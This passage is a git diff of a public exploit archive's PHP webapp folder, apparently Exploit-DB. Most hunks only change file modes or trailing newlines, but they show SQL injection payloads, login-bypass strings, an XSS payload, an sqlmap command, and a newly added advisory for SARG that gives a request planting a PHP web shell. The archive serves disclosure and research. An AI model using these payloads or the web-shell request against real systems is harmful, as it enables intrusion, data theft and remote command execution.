http://localhost/[PATH]/business-searchlist?country=[SQL]&state=[SQL]&city=[SQL]&farm_cat=[SQL] # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42644.html b/platforms/php/webapps/42644.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42645.txt b/platforms/php/webapps/42645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42648.html b/platforms/php/webapps/42648.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4265.txt b/platforms/php/webapps/4265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42653.txt b/platforms/php/webapps/42653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42654.txt b/platforms/php/webapps/42654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42655.txt b/platforms/php/webapps/42655.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42656.txt b/platforms/php/webapps/42656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42657.txt b/platforms/php/webapps/42657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42658.txt b/platforms/php/webapps/42658.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42659.txt b/platforms/php/webapps/42659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42660.txt b/platforms/php/webapps/42660.txt old mode 100755 new mode 100644 index 33b0c83be..bf4962c1d --- a/platforms/php/webapps/42660.txt +++ b/platforms/php/webapps/42660.txt @@ -39,4 +39,4 @@ database system. 7. REFERENCES ======================================== -https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/ +https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/ \ No newline at end of file diff --git a/platforms/php/webapps/42661.txt b/platforms/php/webapps/42661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42662.txt b/platforms/php/webapps/42662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42663.txt b/platforms/php/webapps/42663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42667.txt b/platforms/php/webapps/42667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42668.txt b/platforms/php/webapps/42668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42669.txt b/platforms/php/webapps/42669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4267.txt b/platforms/php/webapps/4267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42670.txt b/platforms/php/webapps/42670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42671.txt b/platforms/php/webapps/42671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42672.txt b/platforms/php/webapps/42672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42673.txt b/platforms/php/webapps/42673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42674.txt b/platforms/php/webapps/42674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42675.txt b/platforms/php/webapps/42675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42676.txt b/platforms/php/webapps/42676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42677.txt b/platforms/php/webapps/42677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42678.txt b/platforms/php/webapps/42678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42679.txt b/platforms/php/webapps/42679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4268.txt b/platforms/php/webapps/4268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42680.txt b/platforms/php/webapps/42680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42681.txt b/platforms/php/webapps/42681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42682.txt b/platforms/php/webapps/42682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42684.txt b/platforms/php/webapps/42684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42685.txt b/platforms/php/webapps/42685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42686.txt b/platforms/php/webapps/42686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42688.txt b/platforms/php/webapps/42688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42689.txt b/platforms/php/webapps/42689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4269.txt b/platforms/php/webapps/4269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4271.txt b/platforms/php/webapps/4271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42713.txt b/platforms/php/webapps/42713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42714.txt b/platforms/php/webapps/42714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42715.txt b/platforms/php/webapps/42715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42716.txt b/platforms/php/webapps/42716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42717.txt b/platforms/php/webapps/42717.txt old mode 100755 new mode 100644 index 1d8076d6b..1c9a7589c --- a/platforms/php/webapps/42717.txt +++ b/platforms/php/webapps/42717.txt @@ -24,4 +24,4 @@ # 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''=' # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42727.txt b/platforms/php/webapps/42727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42728.txt b/platforms/php/webapps/42728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4273.txt b/platforms/php/webapps/4273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42733.txt b/platforms/php/webapps/42733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42734.txt b/platforms/php/webapps/42734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4275.php b/platforms/php/webapps/4275.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42751.txt b/platforms/php/webapps/42751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42752.txt b/platforms/php/webapps/42752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42754.txt b/platforms/php/webapps/42754.txt old mode 100755 new mode 100644 index f6835f18a..18a1d2796 --- a/platforms/php/webapps/42754.txt +++ b/platforms/php/webapps/42754.txt @@ -40,4 +40,4 @@ email in Italian to the company. 2017-09-18 - No response, full public disclosure. DEDICATED TO MARCUS ASTROM -FOREVER LOVED - NEVER FORGOTTEN +FOREVER LOVED - NEVER FORGOTTEN \ No newline at end of file diff --git a/platforms/php/webapps/42755.txt b/platforms/php/webapps/42755.txt old mode 100755 new mode 100644 index 45fbea286..4af0634dc --- a/platforms/php/webapps/42755.txt +++ b/platforms/php/webapps/42755.txt @@ -40,4 +40,4 @@ email in Italian to the company. 2017-09-18 - No response, full public disclosure. DEDICATED TO MARCUS ASTROM -FOREVER LOVED - NEVER FORGOTTEN +FOREVER LOVED - NEVER FORGOTTEN \ No newline at end of file diff --git a/platforms/php/webapps/4276.txt b/platforms/php/webapps/4276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42761.txt b/platforms/php/webapps/42761.txt old mode 100755 new mode 100644 index c6d232cb6..f6fc411a6 --- a/platforms/php/webapps/42761.txt +++ b/platforms/php/webapps/42761.txt @@ -33,5 +33,4 @@ Steps to Reproduce: 3. Solution: -This vulnerability will be fixed in phpMyFAQ 2.9.9 - +This vulnerability will be fixed in phpMyFAQ 2.9.9 \ No newline at end of file diff --git a/platforms/php/webapps/4277.php b/platforms/php/webapps/4277.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42770.txt b/platforms/php/webapps/42770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42771.txt b/platforms/php/webapps/42771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42773.txt b/platforms/php/webapps/42773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42774.txt b/platforms/php/webapps/42774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42775.txt b/platforms/php/webapps/42775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4278.txt b/platforms/php/webapps/4278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42794.txt b/platforms/php/webapps/42794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42795.txt b/platforms/php/webapps/42795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42796.txt b/platforms/php/webapps/42796.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42797.txt b/platforms/php/webapps/42797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42798.txt b/platforms/php/webapps/42798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42799.txt b/platforms/php/webapps/42799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42800.txt b/platforms/php/webapps/42800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42801.txt b/platforms/php/webapps/42801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42802.txt b/platforms/php/webapps/42802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42804.txt b/platforms/php/webapps/42804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42805.txt b/platforms/php/webapps/42805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4282.txt b/platforms/php/webapps/4282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4284.txt b/platforms/php/webapps/4284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42889.txt b/platforms/php/webapps/42889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42893.txt b/platforms/php/webapps/42893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42894.txt b/platforms/php/webapps/42894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42895.txt b/platforms/php/webapps/42895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4291.txt b/platforms/php/webapps/4291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42919.txt b/platforms/php/webapps/42919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42924.txt b/platforms/php/webapps/42924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42925.txt b/platforms/php/webapps/42925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42926.txt b/platforms/php/webapps/42926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42927.txt b/platforms/php/webapps/42927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42934.txt b/platforms/php/webapps/42934.txt old mode 100755 new mode 100644 index c2bf6f82b..d4319f040 --- a/platforms/php/webapps/42934.txt +++ b/platforms/php/webapps/42934.txt @@ -120,4 +120,4 @@ Update to the latest version avalaible. SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ -* Twitter: @sysdream \ No newline at end of file +* Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/42935.txt b/platforms/php/webapps/42935.txt old mode 100755 new mode 100644 index 650358455..e61a0ff54 --- a/platforms/php/webapps/42935.txt +++ b/platforms/php/webapps/42935.txt @@ -117,4 +117,4 @@ Update to the latest version avalaible. SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ -* Twitter: @sysdream \ No newline at end of file +* Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/4295.txt b/platforms/php/webapps/4295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42950.txt b/platforms/php/webapps/42950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42959.py b/platforms/php/webapps/42959.py index 2ae9e9a7c..89b84d098 100755 --- a/platforms/php/webapps/42959.py +++ b/platforms/php/webapps/42959.py @@ -186,4 +186,4 @@ else: conn2.close() # 3. Solution: -# Update to Unitrends UEB 10 +# Update to Unitrends UEB 10 \ No newline at end of file diff --git a/platforms/php/webapps/4296.txt b/platforms/php/webapps/4296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42967.txt b/platforms/php/webapps/42967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42968.txt b/platforms/php/webapps/42968.txt old mode 100755 new mode 100644 index 87dfd5891..ee8dc3cb2 --- a/platforms/php/webapps/42968.txt +++ b/platforms/php/webapps/42968.txt @@ -55,4 +55,4 @@ web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL 5.0 [00:47:57] [WARNING] HTTP error codes detected during run: -500 (Internal Server Error) - 444 times +500 (Internal Server Error) - 444 times \ No newline at end of file diff --git a/platforms/php/webapps/42971.rb b/platforms/php/webapps/42971.rb index 71459a1f7..725204c90 100755 --- a/platforms/php/webapps/42971.rb +++ b/platforms/php/webapps/42971.rb @@ -213,4 +213,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/42972.rb b/platforms/php/webapps/42972.rb index a2fe44a40..8ec907764 100755 --- a/platforms/php/webapps/42972.rb +++ b/platforms/php/webapps/42972.rb @@ -127,4 +127,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/42978.txt b/platforms/php/webapps/42978.txt old mode 100755 new mode 100644 index a36de7209..8ce1c6b0c --- a/platforms/php/webapps/42978.txt +++ b/platforms/php/webapps/42978.txt @@ -41,4 +41,4 @@ OctoberCMS. -- Best Regards, Ishaq Mohammed -https://about.me/security-prince +https://about.me/security-prince \ No newline at end of file diff --git a/platforms/php/webapps/42979.txt b/platforms/php/webapps/42979.txt old mode 100755 new mode 100644 index 2de1251f9..62be8f791 --- a/platforms/php/webapps/42979.txt +++ b/platforms/php/webapps/42979.txt @@ -16,4 +16,4 @@ Poc: Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx - sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs + sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs \ No newline at end of file diff --git a/platforms/php/webapps/42980.txt b/platforms/php/webapps/42980.txt old mode 100755 new mode 100644 index d9ec7091c..f9956fef9 --- a/platforms/php/webapps/42980.txt +++ b/platforms/php/webapps/42980.txt @@ -13,4 +13,4 @@ username and password PoC: Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or' POST: http://vulnsite/esic/index/index.php -DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar +DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar \ No newline at end of file diff --git a/platforms/php/webapps/42981.txt b/platforms/php/webapps/42981.txt old mode 100755 new mode 100644 index 851fd5ea9..f742324bc --- a/platforms/php/webapps/42981.txt +++ b/platforms/php/webapps/42981.txt @@ -24,4 +24,4 @@ Parameter: cpfcnpj (POST) Title: Generic UNION query (NULL) - 5 columns Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL-- -GJkR&btsub=Enviar +GJkR&btsub=Enviar \ No newline at end of file diff --git a/platforms/php/webapps/42982.txt b/platforms/php/webapps/42982.txt old mode 100755 new mode 100644 index 7dd0760dd..1fcd7a859 --- a/platforms/php/webapps/42982.txt +++ b/platforms/php/webapps/42982.txt @@ -33,4 +33,4 @@ Parameter: f (POST) Payload: f=test' UNION ALL SELECT 3344,3344, CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71), - 3344,3344,3344# + 3344,3344,3344# \ No newline at end of file diff --git a/platforms/php/webapps/42983.txt b/platforms/php/webapps/42983.txt old mode 100755 new mode 100644 index 1e4e84557..b38f84ee6 --- a/platforms/php/webapps/42983.txt +++ b/platforms/php/webapps/42983.txt @@ -20,4 +20,4 @@ DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E& cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=& idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com& confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=& -uf=&numero=&complemento=&acao=Salvar +uf=&numero=&complemento=&acao=Salvar \ No newline at end of file diff --git a/platforms/php/webapps/42985.txt b/platforms/php/webapps/42985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42987.txt b/platforms/php/webapps/42987.txt old mode 100755 new mode 100644 index d78e7c80a..6639a0fd4 --- a/platforms/php/webapps/42987.txt +++ b/platforms/php/webapps/42987.txt @@ -30,5 +30,4 @@ Steps to Reproduce: 3. Solution: -The Vulnerability will be fixed in the next release of phpMyFAQ - +The Vulnerability will be fixed in the next release of phpMyFAQ \ No newline at end of file diff --git a/platforms/php/webapps/42988.txt b/platforms/php/webapps/42988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42993.txt b/platforms/php/webapps/42993.txt new file mode 100644 index 000000000..b8e530583 --- /dev/null +++ b/platforms/php/webapps/42993.txt @@ -0,0 +1,22 @@ +# Exploit Title: RCE/Arbitrary file write in Squid Analysis Report Generator (SARG) +# Google Dork: inurl:sarg-php +# Date: 01 September 2017 +# Exploit Author: Pavel Suprunyuk +# Vendor Homepage: https://sourceforge.net/projects/sarg/ +# Software Link: https://sourceforge.net/projects/sarg/ +# Version: Tested on 2.3.10, other versions are vulnerable too. +# Tested on: PHP, any OS +# CVE : None + +=================================== +sarg-php/sarg-squidguard-block2.php does not require any authentication and allows to write an arbitrary file: + +sarg-php/sarg-squidguard-block2.php?file=<your_shell_name.php>&url=<your_php_shell_content> + +Exploit example: + +the following request + +http://vulnerable_site/sarg-php/sarg-squidguard-block2?file=shell.php&url=%3C%3Fphp%20if%20(isset($_GET%5B'cmd'%5D))%20echo%20shell_exec($_GET%5B'cmd'%5D)%3B%20%3F%3E + +will write the basic shell "<?php if (isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>" into the "shell.php" file \ No newline at end of file diff --git a/platforms/php/webapps/430.txt b/platforms/php/webapps/430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4300.txt b/platforms/php/webapps/4300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43011.txt b/platforms/php/webapps/43011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43012.txt b/platforms/php/webapps/43012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43015.txt b/platforms/php/webapps/43015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43027.txt b/platforms/php/webapps/43027.txt old mode 100755 new mode 100644 index f9fa7feec..c1feb9014 --- a/platforms/php/webapps/43027.txt +++ b/platforms/php/webapps/43027.txt @@ -57,4 +57,4 @@ Host: example.com Connection: close Content-type: text/html; charset=UTF-8 -uid=33(www-data) gid=33(www-data) groups=33(www-data) +uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file diff --git a/platforms/php/webapps/43034.txt b/platforms/php/webapps/43034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43035.txt b/platforms/php/webapps/43035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43036.txt b/platforms/php/webapps/43036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43037.txt b/platforms/php/webapps/43037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43038.txt b/platforms/php/webapps/43038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43039.txt b/platforms/php/webapps/43039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43040.txt b/platforms/php/webapps/43040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43041.txt b/platforms/php/webapps/43041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43042.txt b/platforms/php/webapps/43042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43043.txt b/platforms/php/webapps/43043.txt old mode 100755 new mode 100644 index c106058b6..d4215ec20 --- a/platforms/php/webapps/43043.txt +++ b/platforms/php/webapps/43043.txt @@ -34,6 +34,4 @@ Parameter: category (POST) Payload: category=5 AND 1845=1845&keywords=xxxxx ================== -8bitsec - [https://twitter.com/_8bitsec] - - +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43044.txt b/platforms/php/webapps/43044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43046.txt b/platforms/php/webapps/43046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43047.txt b/platforms/php/webapps/43047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43048.txt b/platforms/php/webapps/43048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43049.txt b/platforms/php/webapps/43049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4305.txt b/platforms/php/webapps/4305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43050.txt b/platforms/php/webapps/43050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43051.txt b/platforms/php/webapps/43051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43052.txt b/platforms/php/webapps/43052.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4306.txt b/platforms/php/webapps/4306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43062.txt b/platforms/php/webapps/43062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43063.txt b/platforms/php/webapps/43063.txt old mode 100755 new mode 100644 index 91cd6fcaf..d0f41ea6d --- a/platforms/php/webapps/43063.txt +++ b/platforms/php/webapps/43063.txt @@ -38,4 +38,4 @@ Steps to reproduce: 3. Solution Update to phpMyFAQ Version 2.9.9 -http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip +http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip \ No newline at end of file diff --git a/platforms/php/webapps/43064.txt b/platforms/php/webapps/43064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43066.txt b/platforms/php/webapps/43066.txt old mode 100755 new mode 100644 index 8fea852e4..db1b61754 --- a/platforms/php/webapps/43066.txt +++ b/platforms/php/webapps/43066.txt @@ -37,4 +37,4 @@ # Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87# # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43067.txt b/platforms/php/webapps/43067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43068.txt b/platforms/php/webapps/43068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43069.txt b/platforms/php/webapps/43069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4307.txt b/platforms/php/webapps/4307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43070.txt b/platforms/php/webapps/43070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43071.txt b/platforms/php/webapps/43071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43072.txt b/platforms/php/webapps/43072.txt old mode 100755 new mode 100644 index c5cd593d3..7769b5e95 --- a/platforms/php/webapps/43072.txt +++ b/platforms/php/webapps/43072.txt @@ -46,4 +46,4 @@ # Payload: id=237 AND SLEEP(5) # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43073.txt b/platforms/php/webapps/43073.txt old mode 100755 new mode 100644 index c35aec6ef..ecdb02d60 --- a/platforms/php/webapps/43073.txt +++ b/platforms/php/webapps/43073.txt @@ -26,4 +26,4 @@ <input type="text" name="username" value="' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e202d ,(SELECT (ELT(4=4,1))),VERSiON(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='"/> <input name="password" type="password" value="eFe"/> <input type="Submit" name="login" value="Ver Ayari" /> -</form> +</form> \ No newline at end of file diff --git a/platforms/php/webapps/43074.txt b/platforms/php/webapps/43074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43075.txt b/platforms/php/webapps/43075.txt old mode 100755 new mode 100644 index 0f9a7d61b..49f3de1f2 --- a/platforms/php/webapps/43075.txt +++ b/platforms/php/webapps/43075.txt @@ -33,4 +33,4 @@ # Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43076.txt b/platforms/php/webapps/43076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43077.txt b/platforms/php/webapps/43077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43078.txt b/platforms/php/webapps/43078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43079.txt b/platforms/php/webapps/43079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4308.txt b/platforms/php/webapps/4308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43080.txt b/platforms/php/webapps/43080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43081.txt b/platforms/php/webapps/43081.txt old mode 100755 new mode 100644 index 419e41ef2..1eb8241c0 --- a/platforms/php/webapps/43081.txt +++ b/platforms/php/webapps/43081.txt @@ -33,4 +33,4 @@ # Payload: pid=95&action=edit&id=3 AND SLEEP(5) # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43082.txt b/platforms/php/webapps/43082.txt old mode 100755 new mode 100644 index 91573bf80..4a8bf7ad3 --- a/platforms/php/webapps/43082.txt +++ b/platforms/php/webapps/43082.txt @@ -43,4 +43,4 @@ </table> </div> <input type="submit" name="submit" value="LOGIN" /> -</form> +</form> \ No newline at end of file diff --git a/platforms/php/webapps/43083.txt b/platforms/php/webapps/43083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43084.txt b/platforms/php/webapps/43084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43085.txt b/platforms/php/webapps/43085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43086.txt b/platforms/php/webapps/43086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43087.txt b/platforms/php/webapps/43087.txt old mode 100755 new mode 100644 index 3b891705f..09501a056 --- a/platforms/php/webapps/43087.txt +++ b/platforms/php/webapps/43087.txt @@ -29,4 +29,4 @@ # Email: 'or 1=1 or ''=' Pass: anything # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43088.txt b/platforms/php/webapps/43088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43089.txt b/platforms/php/webapps/43089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4309.txt b/platforms/php/webapps/4309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43090.txt b/platforms/php/webapps/43090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43091.txt b/platforms/php/webapps/43091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43092.txt b/platforms/php/webapps/43092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43093.txt b/platforms/php/webapps/43093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43094.txt b/platforms/php/webapps/43094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43095.txt b/platforms/php/webapps/43095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43096.txt b/platforms/php/webapps/43096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43097.txt b/platforms/php/webapps/43097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43098.txt b/platforms/php/webapps/43098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43099.txt b/platforms/php/webapps/43099.txt old mode 100755 new mode 100644 index bb46bf0ed..d8dc2154a --- a/platforms/php/webapps/43099.txt +++ b/platforms/php/webapps/43099.txt @@ -40,4 +40,4 @@ # Payload: id=27 AND SLEEP(5) # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4310.txt b/platforms/php/webapps/4310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43100.txt b/platforms/php/webapps/43100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/43101.txt 